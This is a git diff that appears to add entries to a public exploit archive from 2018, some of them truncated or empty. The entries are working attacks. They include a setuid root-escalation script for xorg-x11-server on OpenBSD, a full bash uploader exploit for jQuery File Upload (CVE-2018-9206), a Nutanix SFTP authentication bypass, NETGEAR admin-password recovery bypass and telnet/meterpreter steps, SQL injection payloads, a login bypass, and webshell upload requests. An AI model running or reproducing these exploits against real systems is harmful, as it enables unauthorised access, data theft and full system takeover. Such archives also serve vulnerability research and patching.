diff --git a/exploits/hardware/dos/45746.php b/exploits/hardware/dos/45746.php new file mode 100644 index 000000000..f5d1d1b01 --- /dev/null +++ b/exploits/hardware/dos/45746.php @@ -0,0 +1,35 @@ +# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7) +# Date: 2018-10-28 +# Exploit Author: numan türle @numanturle +# Vendor Homepage: https://www.zyxel.com/ +# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/ +# Firmware: 1.00(AAPP.0)D7 +# Tested on: windows +# Fixed firmware: 1.00(AAPP.7) + + +"; + }else { + continue; + } + } +}else { + echo "pfff"; +} +ftp_close($ftp_conn); +?> \ No newline at end of file diff --git a/exploits/hardware/webapps/45741.txt b/exploits/hardware/webapps/45741.txt new file mode 100644 index 000000000..fe84e6fb9 --- /dev/null +++ b/exploits/hardware/webapps/45741.txt @@ -0,0 +1,34 @@ +# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure +# Date: 2018-10-28 +# Exploit Author: Wadeek +# Hardware Version: R6120 +# Firmware Version: 1.0.0.30 +# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx +# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip + +# == Files Containing Juicy Info == +>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) +SSSSSSSNNNNNN + +# == Security Questions Bypass > Password Disclosure == +>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) + +htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) +(replace) +dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= +(by) +dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID= + +">You have successfully recovered the admin password. +">Router Admin Username: admin +">Router Admin Password: Str0ng+-Passw0rd + +# == Authenticated Telnet Command Execution == +>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug +:~$ telnet 192.168.1.1 +R6120 login: admin +Password: Str0ng+-Passw0rd +{ +upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] +download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] +} \ No newline at end of file diff --git a/exploits/jsp/webapps/45755.txt b/exploits/jsp/webapps/45755.txt new file mode 100644 index 000000000..5c07308ef --- /dev/null +++ b/exploits/jsp/webapps/45755.txt @@ -0,0 +1,93 @@ + + + + + \ No newline at end of file diff --git a/exploits/linux/dos/45750.txt b/exploits/linux/dos/45750.txt new file mode 100644 index 000000000..6edcc882a --- /dev/null +++ b/exploits/linux/dos/45750.txt @@ -0,0 +1,23 @@ +# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC) +# Date: 2018-10-29 +# Exploit Author: Nawaf Alkeraithe +# Vendor Homepage: http://sipp.sourceforge.net/ +# Software Link: +https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download + +# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018 +# Tested on: 3.3.990 + +$ ./sipp -trace_logs $(python -c 'print "A"*300') + + + +$ ./sipp -message_file $(python -c 'print "A"*300') + + + +$ ./sipp -calldebug_file $(python -c 'print "A"*300') + + + +$ ./sipp -trace_err $(python -c 'print "A"*300') \ No newline at end of file diff --git a/exploits/multiple/remote/45748.py b/exploits/multiple/remote/45748.py new file mode 100755 index 000000000..28074f1ac --- /dev/null +++ b/exploits/multiple/remote/45748.py @@ -0,0 +1,31 @@ +# Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass +# Date: 2018-10-27 +# Exploit Author: Adam Brown +# Vendor Homepage: https://www.nutanix.org +# Software Link: https://www.nutanix.com/products/software-options/ +# Version: < 5.5.5 (LTS), < 5.8.1 (STS) +# Tested on: Acropolis Operating System +# CVE : Related to CVE-2018-7750 +# +# This PoC is based on discussions found at the following blog post: +# https://coffeegist.com/security/paramiko-ssh-authentication-bypass-in-nutanix/ +# TLDR, the Acropolis SFTP server doesn't check if the client has completed the +# authentication step before allowing the client to open channels. The PoC below +# connects to the acropolis SFTP server, and lists the root directory without +# authenticating. + +#!/usr/bin/python +import paramiko + +host = '127.0.0.1' +port = 2222 + +trans = paramiko.Transport((host, port)) +trans.start_client() + +# If the call below is skipped, no username or password is required. +# trans.auth_password('username', 'password') + +sftp = paramiko.SFTPClient.from_transport(trans) +print(sftp.listdir('/')) +sftp.close() \ No newline at end of file diff --git a/exploits/openbsd/local/45742.sh b/exploits/openbsd/local/45742.sh new file mode 100755 index 000000000..386beaa89 --- /dev/null +++ b/exploits/openbsd/local/45742.sh @@ -0,0 +1,76 @@ +# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation +# Date: 2018-10-27 +# Exploit Author: Marco Ivaldi +# Vendor Homepage: https://www.x.org/ +# Version: xorg-x11-server 1.19.0 - 1.20.2 +# Tested on: OpenBSD 6.3 and 6.4 +# CVE : CVE-2018-14665 + +# raptor_xorgasm + +#!/bin/sh + +# +# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron +# Copyright (c) 2018 Marco Ivaldi +# +# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission +# check for -modulepath and -logfile options when starting Xorg. X server +# allows unprivileged users with the ability to log in to the system via +# physical console to escalate their privileges and run arbitrary code under +# root privileges (CVE-2018-14665). +# +# This exploit targets OpenBSD's cron in order to escalate privileges to +# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical +# console, it works perfectly on pseudo-terminals connected via SSH as well. +# +# See also: +# https://lists.x.org/archives/xorg-announce/2018-October/002927.html +# https://www.exploit-db.com/exploits/45697/ +# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 +# +# Usage: +# blobfish$ chmod +x raptor_xorgasm +# blobfish$ ./raptor_xorgasm +# [...] +# Be patient for a couple of minutes... +# [...] +# Don't forget to cleanup and run crontab -e to reload the crontab. +# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab +# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned +# blobfish# id +# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) +# +# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): +# OpenBSD 6.4 (Xorg 1.19.6) [tested] +# OpenBSD 6.3 (Xorg 1.19.6) [tested] +# + +echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron" +echo "Copyright (c) 2018 Marco Ivaldi " + +# prepare the payload +cat << EOF > /tmp/xorgasm +cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available +echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c +gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid +chmod 4777 /usr/local/bin/pwned +EOF +chmod +x /tmp/xorgasm + +# trigger the bug +cd /etc +Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 & +sleep 5 +pkill Xorg + +# run the setuid shell +echo +echo "Be patient for a couple of minutes..." +echo +sleep 120 +echo +echo "Don't forget to cleanup and run crontab -e to reload the crontab." +ls -l /etc/crontab* +ls -l /usr/local/bin/pwned +/usr/local/bin/pwned \ No newline at end of file diff --git a/exploits/php/webapps/45584.txt b/exploits/php/webapps/45584.txt index 9c3bb6d0f..3d282b4fe 100644 --- a/exploits/php/webapps/45584.txt +++ b/exploits/php/webapps/45584.txt @@ -14,4 +14,285 @@ # Exploit Code: -$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php \ No newline at end of file +$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php + + +#!/bin/bash + + + +USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" + +PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php") + +MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php" + + + +# What is added in this exploit from the original version + +# - a bit of refactoring + +# - automatically request the right filename if it already exists on server ex: 'file (1).php' + +# - Try to detect plugin version, + +# - Try to detect index.html (allowing files upload via gui) + + + +# Checking curl & jq + + + +curl -h &>/dev/null + +if [ $? -ne 0 ]; then + + echo "[!] Please install curl." + + echo "# apt install curl" + + exit 1 + +fi + + + +jq -h &>/dev/null + +if [ $? -ne 0 ]; then + + echo "[!] Please install jq." + + echo "# apt install jq" + + exit 1 + +fi + + + +# Checking url + + + +if [ -z $1 ]; then + + echo "[!] Please supply a target host as an argument." + + echo "$0 http://www.example.com" + + exit 1 + +fi + + + +# Generating payload + + + +echo "" > ${MALICIOUS_FILE} + +echo "________________________________________________________________________________" + +echo "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206" + +echo "|Checks for older versions of the code and upload an harmless file." + +echo "|" + +echo "| @_larry0, @phackt_ul" + +echo "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)." + +echo "---/" + +echo + +echo "[+] Checking variations :" + + + +# Creating alias + + + +curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"' + + + +index=-1 + +found=0 + + + +# Looking for upload php class file + + + +for x in ${PATHS[@]}; do + + echo "[*] Testing... -> $1/$x" + + ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null + + + + if [ $? -eq 0 ]; then + + echo "[+] Found Path: $x" + + index=$((${index}+1)) + + found=1 + + break; + + fi; + + + + index=$((${index}+1)) + + + +done + + + +# Determining the exploit path according to the jquery version + + + +exploit_path="" + + + +if [ ${index} -eq 0 -o ${index} -eq 2 ];then + + exploit_path="server/php/index.php" + +fi + + + +if [ ${index} -eq 1 ];then + + exploit_path="example/upload.php" + +fi + + + +if [ ${index} -eq 3 ];then + + exploit_path="php/index.php" + +fi + + + +if [ ${found} -ne 1 ]; then + + echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!" + + exit 1 + +fi + + + +# Trying to detect bower.json, package.json + + + +version_files=("bower.json package.json") + + + +for x in ${version_files[@]}; do + + version=`${curl} "$1/$x" | jq -r .version` + + if [ "X" != "X""${version}" ]; then + + echo "[!] Found: Plugin version ${version}" + + break; + + fi + +done + + + +# Trying to detect index.html + + + +${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null + + + +if [ $? -eq 0 ]; then + + echo "[!] Found: $1/index.html is accessible" + +fi + + + +# Uploading payload + + + +res="" + +echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\"" + + + +filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name` + + + +if [ "X""${filename}" == "X" ]; then + + echo "[!] It seems that we had a false positive! :(" + + exit 1 + +fi + + + +filename=`echo "$filename" | sed 's/ /%20/g'` + + + +# Trying to see if victim has been exploited + + + +echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}" + +res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"` + + + +if [ "${res}" == "it works" ]; then + + echo "[!] Found: $1 is vulnerable" + +else + + echo "[+] Seems not vulnerable :(" + +fi + + + +rm -f "${MALICIOUS_FILE}" &>/dev/null \ No newline at end of file diff --git a/exploits/php/webapps/45736.txt b/exploits/php/webapps/45736.txt new file mode 100644 index 000000000..2874b08e2 --- /dev/null +++ b/exploits/php/webapps/45736.txt @@ -0,0 +1,61 @@ +# Exploit Title: South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/southgateinn_0.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit +# +POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 104 +USERID=1&UNAME=Anonymous&USERNAME=efe&deptid=&UPASS=efe&ROLE=Administrator&deptid=&PHONE=912856478&save= +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 14:20:22 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 57 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] +# +GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION%20SELECT%201,2,3,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),5,6,7,8,9,10,11--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 14:23:59 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45737.txt b/exploits/php/webapps/45737.txt new file mode 100644 index 000000000..a3c979a52 --- /dev/null +++ b/exploits/php/webapps/45737.txt @@ -0,0 +1,77 @@ +# Exploit Title: Electricks eCommerce 1.0 - 'prodid' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/billyblue +# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index_search.php +# +#[PATH]/index_search.php +#.... +#139 if (isset($_POST['search'])){ +#140 +#141 $search=$_POST['search']; +#142 +#143 $query="SELECT * FROM products WHERE category LIKE '%$search%' OR prod_name LIKE '%$search%' OR prod_desc LIKE '%$search%'"; +#144 $result = mysqli_query($dbconn,$query); +#145 while($res=mysqli_fetch_array($result)){ +#146 $prod_id=$res['prod_id']; +#.... +POST /[PATH]/index_search.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 265 +search=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 14:51:00 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/pages/product_details.php?prod_id=[SQL] +# +#[PATH]/pages/product_details.php +#.... +#49 include('../config/dbconn.php'); +#50 $prod_id=$_GET['prod_id']; +#51 $query = "SELECT * FROM products WHERE prod_id='$prod_id'"; +#52 $result = mysqli_query($dbconn,$query); +#53 while($res = mysqli_fetch_array($result)) { +#.... +GET /[PATH]/pages/product_details.php?prod_id=%2d%31%32%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%29%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 14:55:09 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 7673 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45739.txt b/exploits/php/webapps/45739.txt new file mode 100644 index 000000000..668f3388c --- /dev/null +++ b/exploits/php/webapps/45739.txt @@ -0,0 +1,46 @@ +# Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection +# Date: 2018-10-24 +# Exploit Author: Boumediene KADDOUR +# Unit: Algerie Telecom R&D Unit +# Vendor Homepage: https://www.phptpoint.com/ +# Software Link: https://www.phptpoint.com/pharmacy-management-system/ +# Version: 1 +# Tested on: WAMP windows 10 x64 +# CVE: unknown + +# Description: +# phptpoint Pharmacy Management System SQL injection suffers from a SQL +# injection vulnerability that allows an attacker to bypass the login page +# and authenticate as admin or any other user. + +# Vulnerable Code: + +# 4 $username=$_POST['username']; +# 5 $password=$_POST['password']; +# 6 $position=$_POST['position']; +# 7 switch($position){ +# 8 case 'Admin': +# 9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE +# username='$username' AND password='$password'"); +# 10 $row=mysql_fetch_array($result); + +# Payload: + +POST /Pharmacy/index.php HTTP/1.1 +Host: 172.16.122.4 +Content-Length: 80 +Cache-Control: max-age=0 +Origin: http://172.16.122.4 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://172.16.122.4/Pharmacy/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7 +Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85 +Connection: close + +username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login \ No newline at end of file diff --git a/exploits/php/webapps/45740.txt b/exploits/php/webapps/45740.txt new file mode 100644 index 000000000..466c48788 --- /dev/null +++ b/exploits/php/webapps/45740.txt @@ -0,0 +1,120 @@ +# Exploit Title: Webiness Inventory 2.9 - Arbitrary File Upload +# Date: 2018-10-27 +# Exploit Author: Boumediene KADDOUR +# Unit: Algerie Telecom R&D Unit +# Software Link: https://github.com/webiness/webiness_inventory +# Version: 2.9< +# Tested on: WAMP windows 10 x64 +# CVE: unknown + +# Vulnerable Code: https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php + +46 foreach ($_FILES as $file) { +47 $fileName = $file['name']; +48 $fileTmp = $file['tmp_name']; +49 $destDir = WsROOT.'/runtime/'.$model; +50 +51 $field = key($_FILES); +52 +53 // files are upload to "runtime" directory create destination directory +54 // if not exist +55 if (!file_exists($destDir)) { +56 mkdir($destDir, 0777, true); +57 } +58 +59 // allowed file size is 3MB +60 if ($file['size'] > 3145728) { +61 continue; +62 } +63 +64 // remove old file with same name +65 if (file_exists($destDir.'/'.$fileName)) { +66 unlink($destDir.'/'.$fileName); +67 } +68 +69 // upload file +70 move_uploaded_file($fileTmp, $destDir.'/'.$fileName); +71 $m->$field= $fileName; +72 } + +# Proof Of Concept + +POST /webiness_inventory-2.3/protected/library/ajax/WsSaveToModel.php HTTP/1.1 +Host: 172.16.122.4 +Content-Length: 1838 +Accept: */* +Origin: http://172.16.122.4 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7 +Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7 +Cookie: resolve_ids=0; order_dir_list_by=1A; _csrf=b49cff27d7c0ccd3a8dd5af3813025249dc909f2a20c12efcb7770f945715b06a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224dWxR4kKmI-ZSWJBsigl0tHhdecVhozc%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; PHPSESSID=h66id6epvp8g1uoshrdog53323 +Connection: close + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="model_name" + +PartnerModel +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="id" + +2 +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="partner_name" + +My crucial Partner +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="logo"; filename="shell.php" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="id_number" + +25 +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="tax_number" + +225588664477 +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="iban" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="address1" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="address2" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="region_state" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="zip" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="city" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="country" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="email" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="web" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="phone_number" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7 +Content-Disposition: form-data; name="" + +------WebKitFormBoundaryUOOyIF2f26nDrsM7-- + +# Access your webshell via the below link +http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/shell.php?cmd=whoami \ No newline at end of file diff --git a/exploits/php/webapps/45747.txt b/exploits/php/webapps/45747.txt new file mode 100644 index 000000000..a03dd6999 --- /dev/null +++ b/exploits/php/webapps/45747.txt @@ -0,0 +1,86 @@ +# Exploit Title: MyBB Downloads 2.0.3 - SQL Injection +# Date: 28-10-2018 +# Exploit Author: Lucian Ioan Nitescu +# Contact: https://twitter.com/LucianNitescu +# Webiste: https://nitesculucian.github.io +# Vendor Homepage: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads +# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads +# Version: 2.0.3 +# Tested on: Ubuntu 18.04 + +1. Description: + +It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval. + +2. Proof of Concept: + +Persistent XSS +- Go to downloads.php page +- Create a New Download +- Add the following to the title: a" +- Now on submit, the user will be prompted to an SQL Injection specific error. + +``` +MyBB has experienced an internal SQL error and cannot continue. + +SQL Error: + 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1 +Query: + SELECT * FROM mybb_downloads WHERE name="a"" +``` + +- THis can be exploited with: sqlmap -r request_file -p name --threads 5 + +3. Request File example: + +POST /downloads.php?newdownload=1 HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost:8081/downloads.php?newdownload=1 +Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160 +Content-Length: 1029 +Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="my_post_key" + +6cb47e578ed16aa5272c55b0cb8745b4 +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="name" + +a" +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="shortdesc" + +test +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="description" + +test +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="image" + + +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="url" + +1 +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="numimages" + +4 +-----------------------------171894060312075061251712806160 +Content-Disposition: form-data; name="submit" + +Publish download +-----------------------------171894060312075061251712806160-- + +3. Solution: + +There is no public available solution. \ No newline at end of file diff --git a/exploits/php/webapps/45751.txt b/exploits/php/webapps/45751.txt new file mode 100644 index 000000000..167b37de9 --- /dev/null +++ b/exploits/php/webapps/45751.txt @@ -0,0 +1,92 @@ +# Exploit Title: Expense Management 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-30 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.webprojectbuilder.com/item/expense-management +# Software Link: https://kent.dl.sourceforge.net/project/expense-management/php_ci-expense_manager-script-1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/user/add_edit +# +# http://localhost/[PATH]/assets/images/[FILE] +# +POST /[PATH]/user/add_edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: 